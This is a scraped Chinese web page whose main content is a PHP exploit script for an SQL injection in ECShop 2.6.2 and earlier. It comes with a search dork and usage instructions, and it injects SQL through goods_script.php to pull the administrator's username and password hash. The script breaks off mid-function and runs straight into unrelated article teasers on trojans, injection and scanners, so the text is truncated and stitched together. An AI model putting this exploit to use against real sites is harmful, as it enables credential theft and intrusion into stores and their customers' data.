ECShop的漏洞:sql没有初始化
影响2.5.x和2.6.x,其他版本未测试
goods_script.php
44行:
$sql没有初始化,很明显的一个漏洞:)
EXP:
复制代码
代码如下:
#!/usr/bin/php
print_r('
+---------------------------------------------------------------------------+
ECShop<= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
* works with register_globals = On
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$resp = send();
preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);
if ($hash)
exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
exit("Exploit Failed!\n");
function send()
{
global $host, $path;
$cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';
$data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n";
$data .= "Connection: Close\r\n\r\n";
$data .= $cmd;
电脑文件夹加密怎么做?硬件文件夹加密好还是软件文件夹加密好?
现在,在公司上班族中,由于每天都会形成很多工作文件,一些文件还涉及到单位的无形资产和商业机密,如何保护这些文件的安全就成为当前企业网络管理的重要方面。而对于电脑文件加密,则通常有两种方法:软件加密
详情2018-01-07 08:28:05责编:llp 来源:驱动管家asp.net基础教程 使用asp.net加密口令保护用户数据安全
当我们在网站上建立数据库时,保护用户的信息安全是非常必要的。多数用户不愿意让别人知道自己的信息,同时网管也不想因为安全问题而丢失网站的信誉。无论对于谁,安全问题都是非常重要的。为了解决这个问题,我
详情2018-01-22 13:53:07责编:llp 来源:驱动管家x-scan是什么?x-scan怎么安装与使用?
X-Scan简介X-Scan是中国著名的综合扫描器之一,它是免费的而且不需要安装的绿色软件、界面支持中文和英文两种语言、包括图形界面和命令行方式(X-Scan 3 3以后取消命令行方式)。X-Scan主要由国内著名的民间黑客
详情2018-01-26 16:25:23责编:llp 来源:驱动管家木马suf 1.0的原理 木马suf 1.0的厉害之处
一个14岁的男孩经过无数次的实验,推出了一款全新的木马——SUF 1 0,该后门运用了“反弹端口原理”与“FTP 隧道技术”,也就是两台机器不直接传输数据,而是利用第三台机器(FTP服务器)来交换数据 SUF(Shell
详情2018-02-04 14:02:01责编:llp 来源:驱动管家通过oracle注入直接取得主机cmdshell的方法
原文发表在黑客手册linx 2008 1 12介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS DBMS_EXPORT_EXTENSION… 改成 xxx jsp?id
详情2018-02-13 20:20:26责编:llp 来源:驱动管家怎么解决苹果浏览器safari处理超长的文件时存在漏洞的问题?
Safari处理超长的文件时存在漏洞,如果使用Safari下载了带有超长文件名的文件的话,就可以触发访问破坏,浏览器可能会崩溃。 发布日期:2008-03-22 更新日期:2008-03-24 受影响系统: Apple Safari 3 1 描述: --------------------------------
详情2018-01-15 12:34:06责编:llp 来源:驱动管家.php文件被apache服务器解析成php文件的问题如何解决?
主要问题是:不管文件最后后缀为什么,只要是 php *结尾,就会被Apache服务器解析成php文件,问题是apache如果在mime types文件里面没有定义的扩展名在诸如x1 x2 x3的情况下,最后一个x3的没有定义,他会给解析成
详情2018-02-16 13:07:06责编:llp 来源:驱动管家动易4.03漏洞在哪里?动易4.03漏洞的原理
动易4 03上传漏洞。2005-1-10 就出来了,一直没有公布。看黑客防线的攻关第3关用的是动易所有公布出来了。影响版本: 动易4 03上面的是动易的上传代码,从上面分析,我们可以看到,它明显存在着上传漏洞。重要的
详情2018-02-26 17:05:57责编:llp 来源:驱动管家网站漏洞扫描软件nmap有哪些功能?
nmap被开发用于允许系统管理员察看一个大的网络系统有哪些主机以及其上运行何种服务。它支持多种协议的扫描如UDP,TCP connect(),TCP SYN (half open), ftp proxy (bounce attack),Reverse-ident, ICMP
详情2018-01-30 14:07:38责编:llp 来源:驱动管家数字签名有哪些过程?数字签名的原理是什么?
数字签名和加密的基本原理及其区别?1 数字签名主要经过以下几个过程:信息发送者使用一单向散列函数(HASH函数)对信息生成信息摘要;信息发送者使用自己的私钥签名信息摘要;信息发送者把信息本身和已签名的信
详情2018-01-20 13:30:15责编:llp 来源:驱动管家
- Linux系统使用Shellscript安装网卡驱动的简单方法步骤
- fedora安装打印机驱动的方法
- 怎么在wps软件上快速绘制出一个半闭框的图形
- 有美食餐饮管理系统后台怎么连接打印机?
- 电脑反应很慢是什么原因?电脑反应慢怎么处理
- 笔记本电脑的固态硬盘和台式机的固态硬盘有什么区别吗
- 灰掉的歌单们 正在被点亮
- 全球最大音乐流媒体提交上市文件 将筹资10亿美元
- 如何解决WindowsXP开机黑屏并提示“loader error 3”问题
- 使用win7操作系统的时候容易发生哪些故障?怎么解决
- 联想k860i这样刷机你知道吗?联想k860i刷机步骤
- 360手机n4s充满电能用多久?360手机n4s续航能力怎么样?
- 360浏览器一直崩溃是怎么回事 360安全浏览器崩溃解决办法
- lnk是什么格式文件?怎么才能删除
- 十多年前常用的安全工具 例如阿D注入工具
- 能修改西联汇款拼音姓名?Google AdSense如何直接修改拼音姓名?
- 禁止win7自动安装驱动程序的解决方法
- Ubuntu系统无线网络无法连接 怎样安装无线网卡驱动?
- 用wps软件怎么绘制一个流程图?wps绘制流程图的方法
- ppt幻灯片可以隐藏吗?隐藏ppt幻灯片设置的方法